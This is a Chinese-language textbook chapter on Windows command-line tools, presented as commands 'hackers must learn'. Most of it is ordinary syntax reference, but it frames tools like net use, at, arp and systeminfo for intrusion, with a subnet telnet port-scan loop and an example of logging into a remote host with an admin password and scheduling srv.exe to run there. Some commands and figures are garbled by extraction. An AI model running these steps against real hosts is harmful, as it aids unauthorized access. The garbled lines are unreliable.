黑客必学的DOS命令
3.1基本DOS命令
在DOS应用中,一些基本的命令是必须掌握的,例如查看目标主机的资源、路径的切换等。下面归纳了一些基本的DOS命令,帮助用户更好地学习DOS。
3.1.1 Dir命令
Dir命令是显示磁盘目录命令。在命令提示符窗口中输入Dir命令,然后按下Enter键,即可查看当前目录下的资源列表。
根据资源列表中显示的文件/文件夹名称,可以轻松调用其中的文件资源,还可以进行路径的切换。对于一名黑客来说,必须记住Dir 命令的/a参数,该参数是查看目标主机中带有隐藏性质的文件,例如木马程序、病毒程序等。
使用Dir命令的格式为DIR+盘符+路径+/P+/W。
/P作用是当要查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示Press any key to continue(按下任意键继续)。
/W作用是只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示5个文件名。
【例3-1】在命令提示符窗口中使用Dir命令来查看D盘中的资源。
打开命令提示符窗口,输入
Dir d: /a:d命令,按下Enter键,即可查看D盘下的所有文件目录。
输入Dir d: /a-d命令,按下Enter键,即可查看D盘下的所有文件。
3.1.2 CD命令
CD(Change Directory)命令是改变目录命令,可以用于切换路径目录。
CD命令的使用主要有以下3种方法。
CD PA TH:PA TH
是路径的意思,例如输入CD C:\Windows、CD \C:等。
主要路径存在,在CD后面就可以输
入该路径,否则提示错误信息。
CD..:CD后面加上两个“.”号表示
黑客攻防入门与进阶
36
回到上级父目录,例如当前命令提示
符路径为D:\users\administrator,输入
CD..命令,按下Enter键后,将会返
回到上一级目录,即D:\users目录。
CD\:表示当前提示符的路径无论在
哪个子级目录下,立即返回根目录。
3.1.3 批处理
如果希望一次性执行多条命令,可以使用
批处理文件。
批处理(Batch)也称为批处理脚本。顾名思
义,就是对某对象进行批量的处理。DOS批处
理是基于DOS命令,用来自动地批量地执行
DOS命令以实现特定操作的脚本。
批处理是一种简化的脚本语言,它应用于
DOS和Windows系统中,它是由DOS或者
Windows系统内嵌的命令解释器(通常是
https://www.360docs.net/doc/f69879156.html,或者CMD.EXE)解释运行。
类似于Unix中的Shell脚本。批处理文件具
有.bat或者.cmd的扩展名,例如逐行书写在命
令行中会用到的各种命令。更复杂的情况,需
要使用if、for、goto等命令控制程序的运行过
程,类似于C#、Basic等中高级语言。如果需
要实现更复杂的应用,利用外部程序是必要的,
这包括系统本身提供的外部命令和第三方提供
的工具或者软件。批处理文件,或称为批处理
程序,是由一条条的DOS命令组成的普通文
本文件,可以用记事本直接编辑或用DOS命
令创建,也可以用DOS下的文本编辑器
Edit.exe来编辑。在命令提示下输入批处理文
件的名称,或者双击该批处理文件,系统就会
调用Cmd.exe运行该批处理程序。一般情况下,
每条命令占据一行;当然也可以将多条命令用
特定符号(如:&、&&、|、||等)分隔后写入同
一行中;还有的情况就是像if、for等较高级的
命令则要占据几行甚至几十几百行的空间。系
统在解释运行批处理程序时,首先扫描整个批
处理程序,然后从第一行代码开始向下逐句执
行所有的命令,直至程序结尾或遇见exit命令
或出错意外退出。
1. 创建批处理文件
要创建批处理文件,可以使用记事本和
Copy con命令实现。
【例3-2】使用记事本创建批处理文件。
打开一个记事本,输入dir、md text和
dir命令,每个命令之间使用
Enter键换行。
保存文档名称为p1.bat。
(3) 生成的批处理文件如下图所示。
2. 使用Copy Con命令
使用copy con命令创建批处理文件的方法
很简单。打开命令提示符窗口,输入命令Copy
Con text.bat,然后按下Enter键。
接着输入dir、md text、dir命令,每个命
令使用Enter键换行,输入完毕后按下Ctrl+Z
黑客必学的DOS 命令
37
键结束输入。按下Enter 键,会显示“已复制1个文件”完毕内容,表示成功创建批处理文件。
创建批处理文件后,输入文件名称text ,
按下Enter 键,即可运行创建的批处理文件。
3.2 DOS 命令应用
在了解了DOS 命令的一些基础知识后,下面介绍黑客在攻击时常用的一些命令,帮助用户更好地学习黑客攻防知识。
3.2.1 使用DOS 命令扫描端口
如果没有扫描工具,就可以使用DOS 命令对一个网段的所有端口进行扫描。下面通过实例来介绍使用DOS 命令扫描端口的方法。
【例3-3】使用DOS 命令扫描端口。
打开命令提示符窗口,输入命令for
/1 %a in (1,1,254) do for /1 %b in (1,1,65535) do start /low/min telnet 192.168.0.%a %b 。
按下Enter 键,即可扫描192.168.0.x 这个网段所有开放的3389端口主机,同时尝试对主机进行Telnet 登录,若登录失败则会在5秒内
自动退出。
3.2.2 Arp 命令
Arp 命令是黑客和网络管理员都常用的命令,可以通过此命令进行IP 地址和MAC 地址的欺骗,当然也可以使用该命令来修改ARP 缓存表。
Arp 命令设计本意是用于显示和修改地址解析协议(ARP)缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储IP 地址及其经过解析的以太网或令牌环物理地址。电脑上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则arp 命令将显示帮助信息。
1. Arp 命令语法
Arp 命令的语法为arp[-a [InetAddr] [-N IfaceAddr]] [-g
[InetAddr] [-N IfaceAddr]] [-d
InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]。其中参数的含义如下。
-a[ InetAddr] [ -N IfaceAddr]:显示所有接口的当前ARP 缓存表。要显示特
黑客攻防入门与进阶
38
定 IP 地址的ARP缓存项,请使用带
有InetAddr参数的arp -a,此处的
InetAddr代表IP地址。如果未指定
InetAddr,则使用第一个适用的接口。
要显示特定接口的ARP缓存表,请将
-N IfaceAddr参数与-a参数一起使用,
此处的IfaceAddr代表指派给该接口
的IP地址。-N参数区分大小写。
-g[ InetAddr] [ -N IfaceAddr]:与-a参
数相同。
-d InetAddr [IfaceAddr]:删除指定的
IP地址项,此处的InetAddr代表IP
地址。对于指定的接口,要删除表中
的某项,请使用IfaceAddr参数,此
处的IfaceAddr代表指派给该接口的
IP地址。要删除所有项,请使用星号
(*)通配符代替InetAddr。
-s InetAddr EtherAddr [IfaceAddr]:向
ARP缓存添加可将IP地址InetAddr
解析成物理地址EtherAddr的静态项。
要向指定接口的表添加静态ARP缓
存项,使用faceAddr参数。IfaceAddr
代表指派给该接口的IP地址。
2. Arp命令应用
当黑客入侵内部网络后,可以在任意一台
主机中使用Arp –a命令显示ARP缓存表。此
外黑客也可以伪造MAC地址并与IP地址绑
定,下面通过实例介绍将IP地址与物理地址绑
定的方法。
【例3-4】使用Arp命令将IP地址与物理地址相
互绑定。
教学视频源文件
打开命令提示符窗口,输入命令Arp –s
192.168.1.86 00-AA-00-7F-3A-9C,然后按下
Enter键。
继续输入命令Arp –a,然后按下Enter
键,可以查看到IP地址与物理地址已经绑定。
如果要删除ARP缓存中的IP地址与物
理地址的绑定记录,输入命令Arp –d
192.168.1.86 00-AA-00-7F-3A-9C,然后按下
Enter键即可。
如果想要批量获取局域网中所有电脑的MAC
地址,首先使用Ping命令测试所有需要获取
局域网中所有电脑的MAC地址,然后输入
Arp –a命令,按下Enter键即可获得Ping过的
局域网中所有电脑网卡的MAC地址和对应的
IP地址。
黑客必学的DOS 命令
39
3. 解决并防止ARP 欺骗
采用双向绑定的方法可以有效地解决并且防止ARP 欺骗。
首先获得安全网关的内网的MAC 地址(例如HiPER 网关地址192.168.16.254的MAC 地址为0022aa0022aa),然后编写一个批处理文件rarp.bat ,命令如下。
@echo off Arp –d
Arp –s 192.168.16.254 00-22-aa-00-22-aa 将文件中的网关IP 地址和MAC 地址更改为实际使用的网关IP 地址和MAC 地址即可。最后将这个批处理软件移至【开始】菜单的【所有程序】|【启动】栏中。
4. Arp 常用命令
Arp 命令除了以上的应用外,还有一些常用的命令,有关命令与作用如下表所示。
命 令
作 用
Arp -a 或arp –g
用于查看高速缓存中的所有项目。-a 和-g 参数的结果是一样的,多年来-g 一直是
UNIX 平台上用来显示ARp 高速缓存中所有项目的选项,而Windows 用的是arp –a(-a 可被视为all ,即全部的意思),但它也可以接受比
较传统的-g 选项
(续表)
命 令
作 用
Arp a IP
如果有多个网卡,那么使用
arp -a 加上接口的IP 地址,就可以只显示与该接口相关的ARp 缓存项目
Arp –s IP 物理地址
可以向ARP 高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态,或者在出现错误时,人工配置的物理地址将自动更新该项目 Arp –d IP 人工删除一个静态项目
3.2.3 AT 命令
A T 即Attention ,A T 指令集是从终端设备(Terminal Equipment ,TE)或数据终端设备(Data Terminal Equipment ,DTE)向终端适配器(Terminal Adapter ,TA)或数据电路终端设备(Data Circuit Terminal Equipment ,DCE)发送
的。通过TA 、TE 发送A T 指令来控制移动台(Mobile Station ,MS)的功能,与GSM 网络业务进行交互。用户可以通过A T 指令进行呼叫、短信、电话本、数据业务、传真等方面的控制。
1. AT 命令语法
A T 命令列出了在指定的时间和日期计算机运行的已计划命令或程序。必须正在运行计划服务才能使用A T 命令。它的语法如下:
at [\\computername] [[id] [/delete] | /delete [/yes]]
at [\\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command
2. AT 命令参数
有关AT 命令语法参数的具体含义如下。
黑客攻防入门与进阶
40
\\computername:指定远程计算机。
如果省略该参数,命令将安排在本地
计算机。
id:指定指派给已计划命令的识别码。
/delete:取消已计划的命令。如果省
略了id,计算机中已计划的命令将被
全部取消。
/yes:当删除已计划的事件时,对系
统的查询强制进行肯定的回答。
Time:指定运行命令的时间。将时间
以24小时标记的方式表示,即为小
时:分钟。
/interactive:允许作业与在作业运行
时登录用户的桌面进行交互。
/every:date[,...]:在每个星期或月的指
定日期(例如,每个星期四或每月的第
三天)运行命令。将date指定为星期
的一天或多天(M,T,W,Th,F,S,Su),或
月的一天或多天(使用1~31的数字)。
用逗号分隔多个日期项。如果省略了
date,将假定为该月的当前日期。
/next:date[,...]:在重复出现下一天(例
如,下个星期四)时,运行指定命令将
date指定为星期的一天或多天
(M,T,W,Th,F,S,Su),或月的一天或多
天(使用1~31的数字)。用逗号分隔多
个日期项。如果省略了date,将假定
为该月的当前日期。
Command:指定要运行的Windows
2000命令、程序(.exe或.com文件)或
批处理程序(.bat或.cmd文件)。当命
令需要路径作为参数时,请使用绝对
路径,也就是从驱动器号开始的整个
路径。如果命令在远程计算机上,请
指定服务器和共享名的UNC符号,
而不是远程驱动器号。如果命令不是
可执行(.exe)文件,必须在命令前加上
cmd /c,例如:cmd /c dir > c:\test.out
3. AT命令应用
下面通过实例介绍AT命令的应用,设置
IP为192.168.1.86这台远程电脑在12点执行
srv.exe程序。
【例3-5】使用AT命令控制远程电脑执行程序。
打开命令提示符窗口,输入net use
\\192.168.1.86 /user:"administrator" jxd
命令,其中
administrator
是帐户名称,jxd是帐户密码,但必
须先确定192.168.1.86这台远程电脑有该帐户的
存在。
按下Enter键,当提示“命令成功完成”
内容后,表示已经成功登录192.168.1.86远程
电脑。
输入命令at \\192.168.1.86 12:00 srv.exe,
按下Enter键完成操作。
黑客必学的DOS 命令
41
如果提示“服务尚未开启”,表示远程电脑的Task Scheduler 服务被关闭。
此外,
在命令提示符窗口中输入AT
命令,然后按下Enter 键,可以查看本机正在执行的所有任务,如果没有创建任何任务,会提示“列表是空的”文本内容。
在使用A T 命令时,Task Scheduler 服务必须已经运行。此外,必须成功登录远程电脑以获取执行A T 命令的权限。
3.2.4 Del 命令
Del 即Delete(删除)的缩写,它的作用就是删除文件。在黑客攻击目标主机时,首先使用的就是删除命令,使用Del
命令,可以删除指定的文件,常用于在命令行中完成文件夹或文件的删除任务。
Del
命令的语法为Del [Drive:][Path]FileName […][/p][/f][/s][/q][/a[:Attributes]],
其中各参数的作用如下。
[Drive:][Path]FileName :指定要删除的文件或文件
来的位置和名称。FileName 是必需的。如果要使用多个
文件名,可以使用空格、逗号或分号隔开文件名。
/P :删除每一个文件之前提示确认。 /F :强制删除只读文件。 /S :从所有子目录删除指定文件。
/Q :安静模式。删除全局通配符时,
不要求确认。
/A :根据属性选择要删除的文件。 Attributes :可以是下列文件中的任意一种,r 为只读,a 为存档,s 为系统,h 为隐藏,-为前缀标明“非”。 在了解了语法和参数作用后,如果要删除
D 盘分区中的text 文件中所有文件,以下几种命令都可以实现。
Del d:\text Del d:\text\*.* Del d:\text\. //*.*
需要注意的是,使用Del 命令删除的文件将不会保留在【回收站】中。
3.2.5 RD 命令
除了使用Del 命令外,还可以使用Rmdir(RD)命令删除目录或子目录。该命令语法为:
Rmdir [Drive:]Path[/s][/q] Rd [Drive:]Path[/s][/q] 其中各参数作用如下。
[Drive]Path :指定要删除目录的位置和名称。
/s :删除指定目录和所有子目录以及包含的所有文件。
/q :在安静模式中运行Rmdir ,无需确认即可删除目录。 1. 删除当前目录
如果要删除当前目录,必须返回到其上一级目录下,例如命令提示符路径为C:\a\b ,要删除b 这个目录,就必需退回到C:\a 目录下。
在执行删除当前目录操作之前,必须首先清空目录中的内容。
黑客攻防入门与进阶
42
2. 删除所有文件和子目录
要删除当前目录下的所有文件和子目录,
例如删除路径C:\a\b,输入命令RdC:/s\a,然后
按下Enter键即可。
该命令相当于Deltree命令,可以一次性将
所需删除目录下的所有资源全部删除,需要注
意的是,不能删除包含隐藏文件或系统文件的
目录。
3.2.6 Systeminfo命令
使用Systeminfo命令可以快速获取目标主
机的各种信息,例如操作系统版本、安装的SP
版本号等。
Systeminfo命令的语法为:
SYSTEMINFO [/S system [/U username [/P
password]]] [/FO format] [/NH],其中各参数的
作用如下。
/S system:指定要连接的远端系统。
/U [domain\]user:指定要执行命令的
使用者內容。
/P [password]:指定提供的使用者內
容的密码。
/FO format:指定输出的显示格式。有
效值为TABLE、LIST或CSV。
/NH:指定"Column Header"是否显示
输出。
打开命令提示符窗口,输入Systeminfo命
令,然后按下Enter键,即可显示本机操作系
统信息。
如果要查看远程电脑的系统信息,例如IP
地址为192.168.1.86,输入命令Systeminfo /s
192.168.1.86,然后按下Enter键即可。
在显示的信息列表中,用户可以查看操作
系统的名称、内部版本号以及SP补丁包的版
本情况。在【角色】中分别是默认值为1的域
控制器;默认值为2的成员服务器;默认值为
3的工作组,这些信息对于黑客来说非常重要,
通过这些探测信息可以决定攻击的方法。
3.2.7 Ipconfig命令
IPconfig命令用于显示当前的TCP/IP配置
的设置值。这些信息一般用来检验人工配置的
TCP/IP设置是否正确。如果希望快速获取当前
电脑的所有网络配置信息,就必须掌握Ipconfig
命令。
1. Ipconfig命令常用参数
下面介绍Ipconfig命令使用到的一些常用
参数,用户必须熟练掌握这些参数。
黑客必学的DOS 命令
43
Ipconfig /all :显示本机TCP/IP 配置的详细信息。
Ipconfig /release :DHCP 客户端手工释放IP 地址。
Ipconfig /renew :DHCP 客户端手工向服务器刷新请求。
Ipconfig /flushdns :清除本地DNS 缓存内容。
Ipconfig /displaydns :显示本地DNS 内容。
Ipconfig /registerdns :DNS 客户端手工向服务器进行注册。
Ipconfig /showclassid :显示网络适配器的DHCP 类别信息。
Ipconfig /setclassid :设置网络适配器的DHCP 类别。
Ipconfig /renew “Local Area Connection ”: 更新本地连接适配器的由DHCP 分配IP 地址的配置。
Ipconfig /showclassid Local*:显示名称以Local 开头的所有适配器的DHCP 类别ID 。
Ipconfig /setclassid “Local Area Connection ”TEST :将本地连接适配器的DHCP 类别ID 设置为TEST 。 2. 参数说明
下面介绍有关Ipconfig 命令参数的详细作用和显示信息。
/all :显示所有网络适配器(网卡、拨号连接等)的完整TCP/IP 配置信息。与不带参数的用法相比,它的信息更全更多,如IP 是否动态分配、显示网卡的物理地址等。
/batch 文件名:将Ipconfig 所显示信息以文本方式写入指定文件。此参数
可用来备份本机的网络配置。
/release_all 和/release N :释放全部(或指定)适配器的由 DHCP 分配的动态IP 地址。此参数适用于IP 地址非静态分配的网卡,通常和renew 参数结合使用。
ipconfig /renew_all 或ipconfig /renew N :为全部(或指定)适配器重新分配IP 地址。此参数同样仅适用于IP 地址非静态分配的网卡,通常和上文的release 参数结合使用。 3. Ipconfig 命令应用
在入侵目标主机后,可以使用Ipconfig 命
令查看所有网卡的TCP/IP 配置,例如在命令提示符窗口中输入Ipconfig 命令,按下Enter 键,即可查看所有网卡的IPv6地址或IPv4地址、子网掩码和默认网关等信息。
此外,输入Ipconfig /batch bak-netcfg 命令可以将有关网络配置的信息备份到文件bak-netcfg 中。
黑客攻防入门与进阶
44
输入Ipconfig /release 1命令去除网卡(适配
器1)的动态IP地址。输入Ipconfig /renew 1命
令,可以为网卡重新动态分配IP地址。
3.2.8 Netstat命令
Netstat在前面章节中也有提到过,它是一
个监控TCP/IP网络的非常有用的工具,它可以
显示路由表、实际的网络连接以及每一个网络
接口设备的状态信息。Netstat用于显示与IP、
TCP、UDP和ICMP协议相关的统计数据,一
般用于检验本机各端口的网络连接情况。
1. Netstat命令选项
Netstat命令相关的选项主要有以下几种。
netstat –s:能够按照各个协议分别显
示其统计数据。如果应用程序(如IE
浏览器)运行速度比较慢,或者不能显
示Web页之类的数据,那么用户就可
以用本选项来查看所显示的信息。
需要仔细查看统计数据的各行,找到
出错关键字,进而确定问题所在。
netstat –e:用于显示关于以太网的统
计数据。它列出的项目包括传送的数
据包的总字节数、错误数、删除数、
数据包的数量和广播的数量。这些统
计数据既有发送的数据包数量,也有
接收的数据包数量。这个选项可以用
来统计一些基本的网络流量。
netstat –r:可以显示关于路由表的信
息,类似于后面将要讲的使用route
print命令时看到的信息。除了显示有
效路由外,还显示当前有效的连接。
netstat –a:本选项显示一个所有的有
效连接信息列表,包括已建立的连接
(ESTABLISHED),也包括监听连接请
求(LISTENING)的那些连接。
netstat –n:显示所有已经建立的有效
连接。
2. Netstat命令应用
要查看本机电脑上网时各端口与外部之间
的所有连接情况信息,只需在命令提示符窗口
中输入Netstat命令,按下Enter键即可。
如果要检查共享服务端口的137、138和
139端口开放情况,输入Netstat –ao命令,然
后按下Enter键即可。
在反馈的信息中可以查看到NetBIOS-ns、
NetBIOS-dgm、NetBIOS-ssn信息,分别代表了
黑客必学的DOS 命令
45
137、138和139端口进程开放情况。
3.2.9 Ping 命令
Ping (Packet Internet Grope),因特网包探索器,用于测试网络连接量的程序。Ping 发送一个ICMP 回声请求消息给目的地并报告是否收到所希望的ICMP 回声应答。
1. Ping 命令参数 Ping 命令的语法为:
Ping [-t] [-a] [-n Count] [-1 Size] [-f] [-I TTL] [-v TOS] [-r Count] [-s Count] [{-j HostList | -k HostList}] [-w Timeout] [TargetName]。
下面详细介绍了有关Ping 命令的参数作用。
-t :不断使用Ping 命令发送回响请求信息到目标主机。按下Ctrl+C 键可以中断并退出Ping 。
-a :指定对目标主机IP 地址进行反向名称解析,如果解析成功,Ping 将显示主机名。例如输入命令Ping –a 192.168.1.86,得到下图所示的NetBIOS 名称,其中china-20f6b5d2d 就是目标主机名称。
-n Count :指定发送回响请求消息的次数,默认值为4。可以自己定义发送的个数,对衡量网络速度很有帮助,例如测试发送50个数据包的返
回的平均时间为多少,最快时间为多少,最慢时间为多少,就可以输入命令Ping -n 50 192.168.1.86。
-1 Size :在默认情况下,ping 发送的数据包大小为32byt ,用户可以自定义它的大小,但有一个大小的限制,就是最大只能发送 65500byt 。虽然大小被限制,但该参数配合其他参数以后危害依然非常大。
-f :一般情况下发送的数据包都会通过路由分段再发送给对方,加上该参数以后路由就不会再分段处理。
-i TTL :指定发送回响请求消息的IP 标题中的TTL 字段值。默认值是主机的默认TTL 值,对于Windows 系统来说,该值一般是128,TTL 的最大值为225。
-v TOS :指定发送回响请求消息的IP 标题中将【服务类型】字段设置为TOS 指定的值,默认值为0。
-r Count :一般情况下发送的数据包是通过一个个路由才到达对方的,通过该参数就可以设定想探测经过的路由的个数,但这里限制在9个,也就是说只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现。
-s Count :指定IP 标题中的【Internet 时间戳】选项用于记录每一个跃点的
黑客攻防入门与进阶
46
回响请求消息和响应的回响应答消
息的到达时间。Count的最小值必须
为1,最大值为4。
-j Path:利用computer-list 指定的计
算机列表路由数据包。连续计算机可
以被中间网关分隔(路由稀疏源),IP
允许的最大数量为9。
-k HostList:利用computer-list指定计
算机列表的路由数据包。连续计算机
不能被中间网关分隔(路由严格源),
IP允许的最大数量为9。
-w Timeout:指定超时间隔,单位为
毫秒。
TargetName:指定目的端,可以是IP
地址,也可以是主机名。
2. Ping命令各类反馈信息
在使用Ping命令时,通常会反馈Request
timed out、Destination host Unreachable等信息,
下面详细介绍使用Ping命令后反馈的主要信
息说明。
Request timed out:对方已关机;对方
与自己不在同一网段内,通过路由也
无法找到对方;设置了ICMP数据包
过滤;错误设置IP地址。
Destination host Unreachable:对方与
本机不在同一网段内,而本机又未设
置默认的路由,例如上例中A机中不
设定默认的路由,运行Ping命令就会
出现Destination host Unreachable。
destination host unreachable和time out的区别
在于如果所经过的路由器的路由表中具有到
达目标的路由,而目标因为其他原因不可到
达,这时候会显示time out,如果路由表中连
到达目标的路由都没有,那就会显示
destination host unreachable。
Bad IP address:没有连接到DNS服务
器,所以无法解析这个IP地址,也可
能是IP地址不存在。
Source quench received:表示对方或
中途的服务器繁忙无法回应。
Unknown host(不知名主机):该远程
主机的名字不能被域名服务器(DNS)
转换成IP地址。故障原因可能是域名
服务器有故障,或者名字不正确,或
者网络管理员的系统与远程主机之
间的通信线路有故障。
No answer(无响应):说明本地系统有
一条通向中心主机的路由,但却接收
不到它发给该中心主机的任何信息。
故障原因可能是中心主机没有工作、
本地或中心主机网络配置不正确、本
地或中心的路由器没有工作、通信
线路有故障、中心主机存在路由选
择问题。
no rout to host:网卡工作不正常。
transmit failed,error code:10043网卡
驱动不正常。
unknown host name:DNS配置错误。
3.2.10 Nslookup命令
Nslookup命令可以用来监测网络中DNS
服务器是否能正确实现域名解析。在命令提示
符窗口中输入Nslookup命令,按下Enter键,
反馈信息如下图所示。
黑客必学的DOS 命令
47
黑客可以通过反馈的信息探测目标网站绑定的IP 地址数量,找准攻击IP 地址范围。
Nslookup 命令有许多子命令可以使用,例如ls 命令可以列出域名系统(DNS)域的信息。如果要将默认的查询类型更改为主机信息,并将超时时间更改为30秒,输入命令Nslookup –querytype=hinfo –timeout=30即可。
使用Nslookup 命令最简单的用法是查询网站域名对应的IP 地址,包括A 记录、MX 记录、NS 记录、CHAME 记录等。在命令提示符窗口中输入要查询的网站IP 地址,例如Nslookup https://www.360docs.net/doc/f69879156.html, ,然后按下Enter 键,即可显示https://www.360docs.net/doc/f69879156.html, 这个域名的相关信息。
在实际应用中,黑客都是预先知道攻击网站使用的IP 地址群,然后确定攻击的范围。下面以查询https://www.360docs.net/doc/f69879156.html, 网站为例,使用Nslookup 命令查询IP 地址列表。
【例3-6】使用Nslookup 命令查询IP 地址列表。
教学视频
源文件
打开命令提示符窗口,输入Nslookup 命令,然后按下Enter 键得到反馈信息。
输入查询的网站域名地址www.sina. https://www.360docs.net/doc/f69879156.html, ,然后按下Enter 键,在反馈信息中可以获取IP 地址列表。
获得IP 地址列表是非常重要的,入侵者可以在多台服务器中尝试入侵。
3.2.11 Net 命令
Net 命令是功能强大的以命令行方式执行的工具。它包含了管理网络环境、服务、用户、登录等重要的管理功能。使用它可以轻松地管
理本地或者远程计算机的网络环境,以及各种服务程序的运行和配置。使用它还可以进行用户管理和登陆管理等。Net 命令是黑客最常用的命令之一。
Net 命令应用的范围非常广泛,下面主要介绍有关网络安全方面的命令。
1. Net computer 命令
Net computer 命令可以从域数据库中添加或删除计算机,所有计算机的添加和删除都会
黑客攻防入门与进阶
48 转发到主域控制器。该命令语法为:net
computer \\computername {/add | /del},其中各
参数的作用如下。
\\computername:指定要从域中添加
或删除的计算机名。
/add:将特定的计算机添加到域中。
/del:从域中删除指定的计算机。
2. Net file命令
Net file命令可以显示某服务器上所有打
开的共享文件名及锁定文件数。该命令也可以
关闭个别文件并取消文件锁定。该命令语法为
net file [id [/close]],其中各参数作用如下。
id:指定文件的标识号。
/close:关闭打开的文件并释放锁定记
录。请从共享文件的服务器中键入该
命令。
3. Net session命令
Net session命令可以列出或断开本地计算
机和与之连接的客户端的会话。该命令语法为
net session [\computername] [/delete],其中各参
数作用如下。
\computername:标识要列出或断开会
话的计算机。
/delete:结束与\computername计算机
会话并关闭本次会话期间计算机的
所有打开文件。如果省略
\computername参数,将取消与本地计
算机的所有会话。
4. Net share命令
Net share命令用于创建、删除或显示共享
资源。该命令语法为:
Net share [sharename]
Net share [shareName=Drive:Path [{/users:
Number | /unlimited}] [/remark: "Text"][/cache:
{manua | automatic | no}]
Net share [{ShareName | Drive:Path}/delete]
该命令各参数的作用如下。
ShareName:指定共享资源的网络名
称,输入带参数ShareName的Net
share命令仅显示有关该共享的信息。
Drive:Path:指定共享目录绝对路径。
/user:Number:设置可以同时访问共
享资源的用户数。
/unlimited:指定可以同时访问共享资
源数量不受限制的用户。
/remark:"Text":添加关于资源的描述
性注释,给外部内容加上引号。
/cache:manual:启用带手动重新集成
的脱机客户端缓存。
/cache:automatic:启用带自动重新集
成的脱机客户端缓存。
/cache:documents:启用共享文档中的
自动缓存。
/cache:programs:启用文档和程序的
自动缓存。
/cache:no:禁用缓存。
/delete:停止共享资源。
在命令提示符窗口中输入命令Net share,
按下Enter键,可以显示本地电脑上的共享资
源信息。
如果要使用共享名DataShare作为本机电
脑中的e:\共享专用目录并包括注释,输入命令
Net Share DataShare=e:\共享专用\remark: "For
department123.",然后按下Enter键即可。
黑客必学的DOS 命令
49
5. Net Start/Stop 命令
Net Start/Stop 命令用于启动、停止网络服务,黑客常使用该命令管理添加的服务,例如启动一个木马服务等。
Net Start/Stop 命令语法为: net start service net stop service
其中参数Service 表示启动或停止的服务,例如输入命令Net Start Server ,按下Enter 键即可启动Server 服务。
下面列出了使用Net Start/Stop 命令启动和关闭的常用服务。
Net start Alerter :启动警报器服务。警报器服务发送警告消息。
Net start Client Service for NetWare :启动NetWare 客户服务。该命令只有在安装了NetWare 客户服务的情况下才能在Windows 2000 Professional 上使用。
Net start ClipBook Serve :启动剪贴簿服务器服务。
Net start Computer Browser :启动计算机浏览器服务。
Net start DHCP Client :启动DHCP 客户服务。该命令只有在安装了TCP/IP 协议之后才可用。
Net start Directory Replicator :启动目录复制程序服务。目录复制程序服务将指定的文件复制到指定服务器上。
Net start Eventlog :启动事件日志服务,该服务将事件记录在本地电脑。
Net start File Server for Macintosh :启动Macintosh 文件服务,允许Macintosh 计算机使用共享文件。
Net start Net Logon :启动网络登录服务。网络登录服务验证登录请求。
Net start Network DDE :启动网络DDE 服务。
Net start Schedule :启动计划服务。计划服务使计算机可以使用at 命令在指定时间启动程序。
Net start Server :启动服务器服务。服务器服务使计算机可以共享网络上的资源。
Net start Simple TCP/IP Services :启动简单TCP/IP 服务服务。该命令只有在安装了TCP/IP 和简单TCP/IP 服务后才可以使用。
Net start Workstation :启动工作站服务。工作站服务使计算机可以连接并使用网络资源。
Net start Telnet :启动telnet 服务,打开23端口,有的情况下需先运行NTLM.exe 。
net start msftpsvc :打开FTP 服务 6. Net time 命令
Net time 命令可以使得本机电脑的时钟与
另一个电脑或域的时钟同步。如果在没有/set 选项的情况下使用,则显示另一个计算机或域的时间。
Net time 命令语法为:
net time [\\computername | /domain[:domain- name] | /rtsdomain[:domainname]] [/set]
net time [\\computername] [/querysntp] |
黑客攻防入门与进阶
50 [/setsntp[:ntp server list]]
其中各参数的作用如下。
\\computername:指定要检查或与之
同步的服务器的名称。
/domain[:domainname]:指定要同步时
间的域。
/rtsdomain[:domainname]:指定要与之
同步的可信时间服务器所在的域。
set:使计算机的时钟与指定的计算机
或域的时间同步。
/querysntp:显示当前为本地计算机或
\\computername所指定的计算机配置
的网络时间协议(NTP)服务器名称。
/setsntp[:ntp server list]:指定本地计算
机所使用的NTP时间服务器的列表。
该列表可以包含IP地址或DNS名称,
用空格分开。如果要使用多个时间服
务器,该列表必须用引号引起来。
【例
3-7】使用Net time命令获取远程主机的系统
时间。
打开命令提示符窗口,输入命令Net
use \\192.168.1.86,然后按下Enter键,当显示
“命令成功完成”文本内容,表示登录到远程
主机中。
输入命令
Net time \\192.168.1.86,按下
Enter键,即可获取远程主机系统时间。
7. Net use命令
Net use命令常用于连接
/断开远程主机,
或者显示有关远程主机的连接信息。在无参数
的情况下使用该命令可以检索网络连接列表。
Net use命令的语法为:
Net use [devicename | *] [\\computername\
sharename[\volume] [password | *]] [/USER:[do-
mainname\]username][/USER:[dotteddomainname\]
username][/USER:[username@dotted domainname]
[/SMARTCARD][/SAVECRED][[/DELETE]|[/P
ERSISTENT:{YES|NO}]]NETUSE{devicename
|*}[password|*]/HOMENETUSE [/PERSISTENT:
{YES | NO}]
该命令各参数的作用如下。
Devicename:指定一个名字以便与资
源相连接,或者指定要切断的设备。
\\computername:指定控制共享资源
的计算机的名字。如果计算机名中包
含有空字符,就要将双反斜线(\\)和计
算机名一起用引号(" ")括起来。计算
机名可以有1~15个字符。
黑客必学的DOS 命令
51
\sharename :共享资源的网络名字。
\volume :指定一个服务器上的 NetWare 卷。用户必须安装Netware 的客户服务(Windows 工作站)或者Netware 的网关服务(Windows 服务器)并使之与NetWare 服务器相连。
Password :访问共享资源所需要的密码。* 进行密码提示。当在密码提示符下输入密码时,密码不会显示。
/USER :指定连接时的一个不同的用户名。
Domainname :指定另外一个域。如果缺省域,就会使用当前登录的域。
Username :指定登录的用户名。
/SMARTCARD :指定连接使用在智能卡上的凭据。
/SAVECRED :指定保留用户名和密码。此开关被忽略,除非命令提示输入用户名和密码。
/HOME :将用户与其主目录相连。
/DELETE :取消一个网络连接,并且从永久连接列表中删除该连接。
/PERSISTENT :控制对永久网络连接的使用。默认值是最近使用的设置。 8. Net view 命令
Net view 命令用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或工作组中计算机的列表。该命令语法为:Net view [\\computername [/cache]| /domain[:domainname]]或Net view /network:nw [\\computername],其中各参数的作用如下。
\\Computername :指定希望查看其共享资源的目标计算机。
